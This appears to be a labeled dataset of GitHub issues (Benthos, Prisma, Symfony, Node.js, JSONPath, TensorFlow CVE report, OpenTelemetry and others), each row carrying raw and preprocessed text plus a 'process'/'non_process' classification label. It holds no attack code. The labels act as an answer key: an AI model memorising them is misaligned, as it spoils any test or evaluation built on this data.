Unnamed: 0 int64 0 832k | id float64 2.49B 32.1B | type stringclasses 1 value | created_at stringlengths 19 19 | repo stringlengths 7 112 | repo_url stringlengths 36 141 | action stringclasses 3 values | title stringlengths 1 744 | labels stringlengths 4 574 | body stringlengths 9 211k | index stringclasses 10 values | text_combine stringlengths 96 211k | label stringclasses 2 values | text stringlengths 96 188k | binary_label int64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
11,942 | 14,707,710,553 | IssuesEvent | 2021-01-04 22:06:16 | Jeffail/benthos | https://api.github.com/repos/Jeffail/benthos | closed | Add support for Grok pattern definitions in external file(s) | bughancement processors | We have a lot of Grok patterns and we'd like to deploy the yaml file from our cfgmgmt system. It makes little sense to include the Grok patterns literally -- they are normally deployed using an RPM, we have tests etc for them.
Would it be possible to provide a `pattern_source` giving a directory (preferably) or file of patterns that should be included next to the default patterns? | 1.0 | Add support for Grok pattern definitions in external file(s) - We have a lot of Grok patterns and we'd like to deploy the yaml file from our cfgmgmt system. It makes little sense to include the Grok patterns literally -- they are normally deployed using an RPM, we have tests etc for them.
Would it be possible to provide a `pattern_source` giving a directory (preferably) or file of patterns that should be included next to the default patterns? | process | add support for grok pattern definitions in external file s we have a lot of grok patterns and we d like to deploy the yaml file from our cfgmgmt system it makes little sense to include the grok patterns literally they are normally deployed using an rpm we have tests etc for them would it be possible to provide a pattern source giving a directory preferably or file of patterns that should be included next to the default patterns | 1 |
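The behavior requested in the record above — merging pattern definitions from an externally deployed directory on top of the defaults — can be sketched in a few lines. This is an illustration only, not Benthos code: the `load_pattern_dir` name and the file format (one `NAME PATTERN` pair per line, `#` for comments) are assumptions.

```python
from pathlib import Path

def load_pattern_dir(dir_path, defaults=None):
    """Merge 'NAME PATTERN' definitions from every file in dir_path
    on top of a default pattern set (later files win on conflicts)."""
    patterns = dict(defaults or {})
    for f in sorted(Path(dir_path).iterdir()):
        if not f.is_file():
            continue
        for line in f.read_text().splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue  # skip blank lines and comments
            name, _, pattern = line.partition(" ")
            patterns[name] = pattern.strip()
    return patterns
```

A `pattern_source` style option pointing at such a directory would let the RPM-deployed, separately tested patterns stay out of the YAML config.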
17,504 | 23,315,753,151 | IssuesEvent | 2022-08-08 12:22:47 | prisma/prisma | https://api.github.com/repos/prisma/prisma | closed | Hi Prisma Team! Prisma Migrate just crashed. | bug/0-unknown kind/bug process/candidate team/schema topic: prisma db pull topic: Your friendly prisma developers | Hi Prisma Team! Prisma Migrate just crashed.
## Command
`db pull`
## Versions
| Name | Version |
|-------------|--------------------|
| Platform | darwin |
| Node | v16.15.1 |
| Prisma CLI | 4.1.0 |
| Engine | 8d8414deb360336e4698a65aa45a1fbaf1ce13d8|
## Error
```
Error: [libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
```
Oops, an unexpected error occured!
[libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
<img width="1346" alt="Screen Shot 2022-07-23 at 18 07 57" src="https://user-images.githubusercontent.com/42682090/180610852-c106747d-0f40-42a7-90f0-db014982b2de.png">
| 1.0 | Hi Prisma Team! Prisma Migrate just crashed. - Hi Prisma Team! Prisma Migrate just crashed.
## Command
`db pull`
## Versions
| Name | Version |
|-------------|--------------------|
| Platform | darwin |
| Node | v16.15.1 |
| Prisma CLI | 4.1.0 |
| Engine | 8d8414deb360336e4698a65aa45a1fbaf1ce13d8|
## Error
```
Error: [libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
```
Oops, an unexpected error occured!
[libs/datamodel/connectors/dml/src/model.rs:494:29] Hi there! We've been seeing this error in our error reporting backend, but cannot reproduce it in our own tests. The problem is that we have a primary key in the model `Product` that uses the column `CategoryId` which we for some reason don't have in our internal representation. If you see this, could you please file an issue to https://github.com/prisma/prisma so we can discuss about fixing this. -- Your friendly prisma developers.
<img width="1346" alt="Screen Shot 2022-07-23 at 18 07 57" src="https://user-images.githubusercontent.com/42682090/180610852-c106747d-0f40-42a7-90f0-db014982b2de.png">
| process | hi prisma team prisma migrate just crashed hi prisma team prisma migrate just crashed command db pull versions name version platform darwin node prisma cli engine error error hi there we ve been seeing this error in our error reporting backend but cannot reproduce it in our own tests the problem is that we have a primary key in the model product that uses the column categoryid which we for some reason don t have in our internal representation if you see this could you please file an issue to so we can discuss about fixing this your friendly prisma developers oops an unexpected error occured hi there we ve been seeing this error in our error reporting backend but cannot reproduce it in our own tests the problem is that we have a primary key in the model product that uses the column categoryid which we for some reason don t have in our internal representation if you see this could you please file an issue to so we can discuss about fixing this your friendly prisma developers img width alt screen shot at src | 1 |
1,835 | 4,634,649,980 | IssuesEvent | 2016-09-29 02:20:54 | symfony/symfony | https://api.github.com/repos/symfony/symfony | closed | ExecutableFinder generates wrong Path | Bug Process Status: Reviewed | Hi,
the ExecutableFinder generates a wrong path when open_basedir is in effect.
For example, if you have installed java at /usr/bin/java and your open_basedir is set to /usr/bin/, the ExecutableFinder will return /usr/bin//java. The problem is that the open_basedir restrictions now say you are not allowed to access /usr/bin//java because of the two slashes.
See: https://github.com/symfony/process/blob/master/ExecutableFinder.php#L82
```php
/**
* $dir = /usr/bin/
* $name = java
* $suffix = '' (empty)
*/
if (is_file($file = $dir.DIRECTORY_SEPARATOR.$name.$suffix) && ('\\' === DIRECTORY_SEPARATOR || is_executable($file))) {
```
Best regards
Tobi
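The double-separator concatenation described in this report is easy to reproduce. The sketch below is plain Python, not Symfony's PHP — just an illustration that trimming the trailing separator before joining avoids the `/usr/bin//java` path that open_basedir rejects:

```python
def candidate_path(directory, name, suffix=""):
    # naive: dir + separator + name reproduces the bug when the
    # configured directory already ends with a separator
    naive = directory + "/" + name + suffix
    # fix: strip any trailing separator before joining
    fixed = directory.rstrip("/") + "/" + name + suffix
    return naive, fixed

naive, fixed = candidate_path("/usr/bin/", "java")
# naive -> "/usr/bin//java" (denied by open_basedir)
# fixed -> "/usr/bin/java"
```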
| 1.0 | ExecutableFinder generates wrong Path - Hi,
the ExecutableFinder generates a wrong path when open_basedir is in effect.
For example, if you have installed java at /usr/bin/java and your open_basedir is set to /usr/bin/, the ExecutableFinder will return /usr/bin//java. The problem is that the open_basedir restrictions now say you are not allowed to access /usr/bin//java because of the two slashes.
See: https://github.com/symfony/process/blob/master/ExecutableFinder.php#L82
```php
/**
* $dir = /usr/bin/
* $name = java
* $suffix = '' (empty)
*/
if (is_file($file = $dir.DIRECTORY_SEPARATOR.$name.$suffix) && ('\\' === DIRECTORY_SEPARATOR || is_executable($file))) {
```
Best regards
Tobi
| process | executablefinder generates wrong path hi the executablefinder is generating a wrong path if you have open basedir in action for example you have installed java in usr bin java and your open basedir is set to usr bin the executablefinder will return usr bin java the problem is that the open basedir restrictions now say you are not allowed to access usr bin java because of the two slashes see php dir usr bin name java suffix empty if is file file dir directory separator name suffix directory separator is executable file best regards tobi | 1 |
3,628 | 6,664,067,955 | IssuesEvent | 2017-10-02 18:44:21 | nodejs/node | https://api.github.com/repos/nodejs/node | closed | fork() does not emit 'error' if process creation fails | child_process | <!--
Thank you for reporting an issue.
This issue tracker is for bugs and issues found within Node.js core.
If you require more general support please file an issue on our help
repo. https://github.com/nodejs/help
Please fill in as much of the template below as you're able.
Version: output of `node -v`
Platform: output of `uname -a` (UNIX), or version and 32 or 64-bit (Windows)
Subsystem: if known, please specify affected core module name
If possible, please provide code that demonstrates the problem, keeping it as
simple and free of external dependencies as you are able.
-->
<!-- Enter your issue details below this comment. -->
* **Version**: v8.6.0
* **Platform**: Linux 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:49:46 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
* **Subsystem**: child_process
Unlike with `spawn`, the `error` handler is not executed when process creation fails for `fork`.
```Javascript
const { fork } = require('child_process');
const subprocess = fork('bad_command');
subprocess.on('error', (err) => {
console.log('Failed to start subprocess.', err);
});
```
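For comparison, the analogous failure in Python's standard library surfaces as a catchable error. This is not Node code — only an analogue of the behavior the reporter expects from `fork`: a process-creation failure that the caller can observe and handle.

```python
import subprocess

def try_fork(command):
    try:
        subprocess.Popen([command])
        return None
    except FileNotFoundError as err:
        # analogous to child_process emitting 'error' on spawn failure
        return err

err = try_fork("bad_command_that_does_not_exist")
# err is a FileNotFoundError rather than a silent failure
```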
| 1.0 | fork() does not emit 'error' if process creation fails - <!--
Thank you for reporting an issue.
This issue tracker is for bugs and issues found within Node.js core.
If you require more general support please file an issue on our help
repo. https://github.com/nodejs/help
Please fill in as much of the template below as you're able.
Version: output of `node -v`
Platform: output of `uname -a` (UNIX), or version and 32 or 64-bit (Windows)
Subsystem: if known, please specify affected core module name
If possible, please provide code that demonstrates the problem, keeping it as
simple and free of external dependencies as you are able.
-->
<!-- Enter your issue details below this comment. -->
* **Version**: v8.6.0
* **Platform**: Linux 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:49:46 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
* **Subsystem**: child_process
Unlike with `spawn`, the `error` handler is not executed when process creation fails for `fork`.
```Javascript
const { fork } = require('child_process');
const subprocess = fork('bad_command');
subprocess.on('error', (err) => {
console.log('Failed to start subprocess.', err);
});
```
| process | fork does not emit error if process creation fails thank you for reporting an issue this issue tracker is for bugs and issues found within node js core if you require more general support please file an issue on our help repo please fill in as much of the template below as you re able version output of node v platform output of uname a unix or version and or bit windows subsystem if known please specify affected core module name if possible please provide code that demonstrates the problem keeping it as simple and free of external dependencies as you are able version platform linux generic ubuntu smp thu apr utc gnu linux subsystem child process unlike spawn in fork on error is not executed javascript const fork require child process const subprocess fork bad command subprocess on error err console log failed to start subprocess err | 1 |
44,543 | 5,632,907,051 | IssuesEvent | 2017-04-05 17:39:53 | sunpy/sunpy | https://api.github.com/repos/sunpy/sunpy | closed | Write additional unit tests for sunpy.lightcurve.lightcurve | Lightcurve Tests | Some tests have been written but gaps in coverage exist.
| 1.0 | Write additional unit tests for sunpy.lightcurve.lightcurve - Some tests have been written but gaps in coverage exist.
| non_process | write additional unit tests for sunpy lightcurve lightcurve some tests have been written but gaps in coverage exist | 0 |
15,817 | 20,014,634,513 | IssuesEvent | 2022-02-01 10:45:53 | ietf-wg-jsonpath/draft-ietf-jsonpath-base | https://api.github.com/repos/ietf-wg-jsonpath/draft-ietf-jsonpath-base | closed | "Union" could have more description, and maybe a new name | processing-model has PR | The term "union" will likely be unfamiliar for readers (it is for me) and could use a bit more description than "A union ~matcher~ selector consists of one or more union elements."
"Union" isn't a common term outside of set manipulation. I would call the `[...]` an "indexer," which is a much more well-known term and is already associated with this construct in many programming languages. The values inside are indices (as opposed to "union children" or "union elements"), of which there are multiple types:
- Integer
- Slice
- String
- Container query expression
- Item query expression
See [selector query expressions](https://github.com/jsonpath-standard/internet-draft/issues/17) for more details on the query-style indexers. | 1.0 | "Union" could have more description, and maybe a new name - The term "union" will likely be unfamiliar for readers (it is for me) and could use a bit more description than "A union ~matcher~ selector consists of one or more union elements."
"Union" isn't a common term outside of set manipulation. I would call the `[...]` an "indexer," which is a much more well-known term and is already associated with this construct in many programming languages. The values inside are indices (as opposed to "union children" or "union elements"), of which there are multiple types:
- Integer
- Slice
- String
- Container query expression
- Item query expression
See [selector query expressions](https://github.com/jsonpath-standard/internet-draft/issues/17) for more details on the query-style indexers. | process | union could have more description and maybe a new name the term union will likely be unfamiliar for readers it is for me and could use a bit more description than a union matcher selector consists of one or more union elements union isn t a common term outside of set manipulation i would call the an indexer which is a much more well known term and is already associated with this construct in many programming languages the values inside are indices as opposed to union children or union elements of which there are multiple types integer slice string container query expression item query expression see for more details on the query style indexers | 1 |
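The index kinds listed in the record above map naturally onto subscript types in most languages, which is part of the argument for the "indexer" name. A small Python sketch, illustrative only and not a JSONPath implementation (the two query-expression kinds would need an evaluator and are omitted):

```python
def apply_index(value, index):
    # int -> single element, slice -> sub-list, str -> member lookup;
    # all three use the same bracket/indexer syntax
    return value[index]

doc = {"store": [10, 20, 30, 40]}
assert apply_index(doc, "store") == [10, 20, 30, 40]       # string index
assert apply_index(doc["store"], 1) == 20                  # integer index
assert apply_index(doc["store"], slice(1, 3)) == [20, 30]  # slice index
```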
120,697 | 17,644,259,793 | IssuesEvent | 2021-08-20 02:04:28 | DavidSpek/kale | https://api.github.com/repos/DavidSpek/kale | opened | CVE-2021-37667 (High) detected in tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl, tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl | security vulnerability | ## CVE-2021-37667 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b>, <b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>
<details><summary><b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl">https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>
Dependency Hierarchy:
- :x: **tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl** (Vulnerable Library)
</details>
<details><summary><b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl">https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>
Dependency Hierarchy:
- tfx_bsl-0.21.4-cp27-cp27mu-manylinux2010_x86_64.whl (Root Library)
- :x: **tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty. We have patched the issue in GitHub commit 2e0ee46f1a47675152d3d865797a18358881d7a6. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
<p>Publish Date: 2021-08-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-37667>CVE-2021-37667</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h">https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h</a></p>
<p>Release Date: 2021-08-12</p>
<p>Fix Resolution: tensorflow - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-cpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-gpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | True | CVE-2021-37667 (High) detected in tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl, tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl - ## CVE-2021-37667 - High Severity Vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b>, <b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>
<details><summary><b>tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl">https://files.pythonhosted.org/packages/7b/c5/a97ed48fcc878e36bb05a3ea700c077360853c0994473a8f6b0ab4c2ddd2/tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/dog-breed-classification/requirements/requirements.txt</p>
<p>
Dependency Hierarchy:
- :x: **tensorflow-1.0.0-cp27-cp27mu-manylinux1_x86_64.whl** (Vulnerable Library)
</details>
<details><summary><b>tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</b></p></summary>
<p>TensorFlow is an open source machine learning framework for everyone.</p>
<p>Library home page: <a href="https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl">https://files.pythonhosted.org/packages/ef/73/205b5e7f8fe086ffe4165d984acb2c49fa3086f330f03099378753982d2e/tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl</a></p>
<p>Path to dependency file: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>Path to vulnerable library: kale/examples/taxi-cab-classification/requirements.txt</p>
<p>
Dependency Hierarchy:
- tfx_bsl-0.21.4-cp27-cp27mu-manylinux2010_x86_64.whl (Root Library)
- :x: **tensorflow-2.1.0-cp27-cp27mu-manylinux2010_x86_64.whl** (Vulnerable Library)
</details>
<p>Found in base branch: <b>master</b></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary>
<p>
TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.UnicodeEncode`. The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unicode_ops.cc#L533-L539) reads the first dimension of the `input_splits` tensor before validating that this tensor is not empty. We have patched the issue in GitHub commit 2e0ee46f1a47675152d3d865797a18358881d7a6. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
<p>Publish Date: 2021-08-12
<p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2021-37667>CVE-2021-37667</a></p>
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.8</b>)</summary>
<p>
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Local
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: High
- Integrity Impact: High
- Availability Impact: High
</p>
For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>.
</p>
</details>
<p></p>
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary>
<p>
<p>Type: Upgrade version</p>
<p>Origin: <a href="https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h">https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w74j-v8xh-3w5h</a></p>
<p>Release Date: 2021-08-12</p>
<p>Fix Resolution: tensorflow - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-cpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0, tensorflow-gpu - 2.3.4, 2.4.3, 2.5.1, 2.6.0</p>
</p>
</details>
<p></p>
***
Step up your Open Source Security Game with WhiteSource [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) | non_process | cve high detected in tensorflow whl tensorflow whl cve high severity vulnerability vulnerable libraries tensorflow whl tensorflow whl tensorflow whl tensorflow is an open source machine learning framework for everyone library home page a href path to dependency file kale examples dog breed classification requirements requirements txt path to vulnerable library kale examples dog breed classification requirements requirements txt dependency hierarchy x tensorflow whl vulnerable library tensorflow whl tensorflow is an open source machine learning framework for everyone library home page a href path to dependency file kale examples taxi cab classification requirements txt path to vulnerable library kale examples taxi cab classification requirements txt dependency hierarchy tfx bsl whl root library x tensorflow whl vulnerable library found in base branch master vulnerability details tensorflow is an end to end open source platform for machine learning in affected versions an attacker can cause undefined behavior via binding a reference to null pointer in tf raw ops unicodeencode the reads the first dimension of the input splits tensor before validating that this tensor is not empty we have patched the issue in github commit the fix will be included in tensorflow we will also cherrypick this commit on tensorflow tensorflow and tensorflow as these are also affected and still in supported range publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required low user interaction none scope unchanged impact metrics confidentiality impact high integrity impact high availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution tensorflow tensorflow cpu tensorflow gpu step 
up your open source security game with whitesource | 0 |
4,402 | 7,296,341,756 | IssuesEvent | 2018-02-26 10:26:04 | UKHomeOffice/dq-aws-transition | https://api.github.com/repos/UKHomeOffice/dq-aws-transition | opened | Add ACL FTP crontab entry to 00201SG1LFTP01.crontab | DQ Data Ingest DQ Tranche 1 Production SSM processing | # ACL from ACL FTP server
*/10 0 * * * /ADT/scripts/ftp_acl_web02.py | 1.0 | Add ACL FTP crontab entry to 00201SG1LFTP01.crontab - # ACL from ACL FTP server
*/10 0 * * * /ADT/scripts/ftp_acl_web02.py | process | add acl ftp crontab entry to crontab acl from acl ftp server adt scripts ftp acl py | 1 |
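The five cron fields are minute, hour, day-of-month, month, and day-of-week, so `*/10 0 * * *` fires every 10 minutes but only during the 00:xx hour. A small sketch (illustrative only, not part of the deployment) expands the step syntax to make that visible:

```python
def expand_step(field, upper):
    """Expand a cron field that is either '*/n' or a literal value."""
    if field.startswith("*/"):
        step = int(field[2:])
        return list(range(0, upper, step))
    return [int(field)]

minutes = expand_step("*/10", 60)  # [0, 10, 20, 30, 40, 50]
hours = expand_step("0", 24)       # [0] -> midnight hour only
```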
17,808 | 23,730,407,710 | IssuesEvent | 2022-08-31 00:52:16 | open-telemetry/opentelemetry-collector-contrib | https://api.github.com/repos/open-telemetry/opentelemetry-collector-contrib | closed | prometheus translator: multiple target metric might be emitted if groupbyattrs processor is involved | bug priority:p2 exporter/prometheusremotewrite receiver/prometheus processor/groupbyattrs | **Describe the bug**
A clear and concise description of what the bug is.
Given a metrics pipeline like `prometheus` receiver -> `groupbyattrs` processor -> `prometheusremotewrite` exporter: `groupbyattrs` effectively splits one `pmetric.Metrics` into multiple `pmetric.Metrics`, and in the `prometheusremotewrite` exporter the translator [adds](https://github.com/open-telemetry/opentelemetry-collector-contrib/blob/main/pkg/translator/prometheusremotewrite/metrics_to_prw.go#L103) the resource target info (the `target` metric) for every `pmetric.Metrics`, so we eventually end up with multiple `target` metrics; see the additional context section for more details on our use case.
**Steps to reproduce**
give a simple metrics like
```
# HELP m
# TYPE m gauge
m{a="a", n="1"} 0
m{a="a", n="2"} 0
m{a="b", n="1"} 0
m{a="b", n="2"} 0
```
and a config
```yaml
receivers:
prometheus:
config:
scrape_configs:
- job_name: kubernetes-cadvisor-metrics
metrics_path: /metrics.txt
static_configs:
- targets:
- localhost:8000
exporters:
prometheusremotewrite:
endpoint: http://localhost:8428/api/v1/write
processors:
batch:
groupbyattrs:
keys:
- a
service:
telemetry:
logs:
level: debug
metrics:
level: detailed
address: 127.0.0.1:8888
pipelines:
metrics:
receivers: [prometheus]
processors: [batch, groupbyattrs]
exporters: [ prometheusremotewrite ]
```

**What did you expect to see?**
Just one target metric for a scrape target.
**What did you see instead?**
Multiple target metrics.
**What version did you use?**
Version: v0.55.0
**What config did you use?**
Config: (e.g. the yaml config file)
**Environment**
OS: (e.g., "Ubuntu 20.04")
Compiler(if manually compiled): (e.g., "go 14.2")
**Additional context**
The reason we need groupbyattrs is that we are collecting cadvisor metrics and enriching them with additional pod info. To do so we group metrics by `namespace` and `pod` name and then follow with a `k8sattributes` processor, since it currently only supports enrichment based on resources, not metric attributes. This is also probably more efficient, as enriching many metrics individually seems more expensive than grouping them by 2 attributes first.
```yaml
resource/copy:
attributes:
- key: k8s.namespace.name
from_attribute: namespace
action: insert
- key: k8s.pod.name
from_attribute: pod
action: insert
k8sattributes:
pod_association:
- sources:
- from: resource_attribute
name: k8s.namespace.name
- from: resource_attribute
name: k8s.pod.name
```
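The fan-out that produces the duplicate `target` series can be illustrated with a grouping sketch. This is plain Python, not collector code: one scrape's data points split into one group per value of the grouping key, and the exporter then adds one target-info entry per resulting batch.

```python
from collections import defaultdict

def group_by_attr(points, key):
    """Split one batch of points into one group per value of `key`."""
    groups = defaultdict(list)
    for p in points:
        groups[p[key]].append(p)
    return dict(groups)

# the four series from the reproduction case, keyed on attribute "a"
points = [{"a": "a", "n": "1"}, {"a": "a", "n": "2"},
          {"a": "b", "n": "1"}, {"a": "b", "n": "2"}]
groups = group_by_attr(points, "a")
# two groups -> the exporter would emit target info twice,
# once per resulting pmetric.Metrics batch
assert len(groups) == 2
```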
| 1.0 | prometheus translator: multiple target metric might be emitted if groupbyattrs processor is involved - **Describe the bug**
A clear and concise description of what the bug is.
Given a metrics pipeline like `prometheus` receiver -> `groupbyattrs` processor -> `prometheusremotewrite` exporter: `groupbyattrs` effectively splits one `pmetric.Metrics` into multiple `pmetric.Metrics`, and in the `prometheusremotewrite` exporter the translator [adds](https://github.com/open-telemetry/opentelemetry-collector-contrib/blob/main/pkg/translator/prometheusremotewrite/metrics_to_prw.go#L103) the resource target info (the `target` metric) for every `pmetric.Metrics`, so we eventually end up with multiple `target` metrics; see the additional context section for more details on our use case.
**Steps to reproduce**
give a simple metrics like
```
# HELP m
# TYPE m gauge
m{a="a", n="1"} 0
m{a="a", n="2"} 0
m{a="b", n="1"} 0
m{a="b", n="2"} 0
```
and a config
```yaml
receivers:
prometheus:
config:
scrape_configs:
- job_name: kubernetes-cadvisor-metrics
metrics_path: /metrics.txt
static_configs:
- targets:
- localhost:8000
exporters:
prometheusremotewrite:
endpoint: http://localhost:8428/api/v1/write
processors:
batch:
groupbyattrs:
keys:
- a
service:
telemetry:
logs:
level: debug
metrics:
level: detailed
address: 127.0.0.1:8888
pipelines:
metrics:
receivers: [prometheus]
processors: [batch, groupbyattrs]
exporters: [ prometheusremotewrite ]
```

**What did you expect to see?**
Just one target metric for a scrape target.
**What did you see instead?**
Multiple target metrics.
**What version did you use?**
Version: v0.55.0
**What config did you use?**
Config: (e.g. the yaml config file)
**Environment**
OS: (e.g., "Ubuntu 20.04")
Compiler(if manually compiled): (e.g., "go 14.2")
**Additional context**
The reason we need groupbyattrs is that we are collecting cadvisor metrics and enriching them with additional pod info. To do so we group metrics by `namespace` and `pod` name and then follow with a `k8sattributes` processor, since it currently only supports enrichment based on resources, not metric attributes. This is also probably more efficient, as enriching many metrics individually seems more expensive than grouping them by 2 attributes first.
```yaml
resource/copy:
attributes:
- key: k8s.namespace.name
from_attribute: namespace
action: insert
- key: k8s.pod.name
from_attribute: pod
action: insert
k8sattributes:
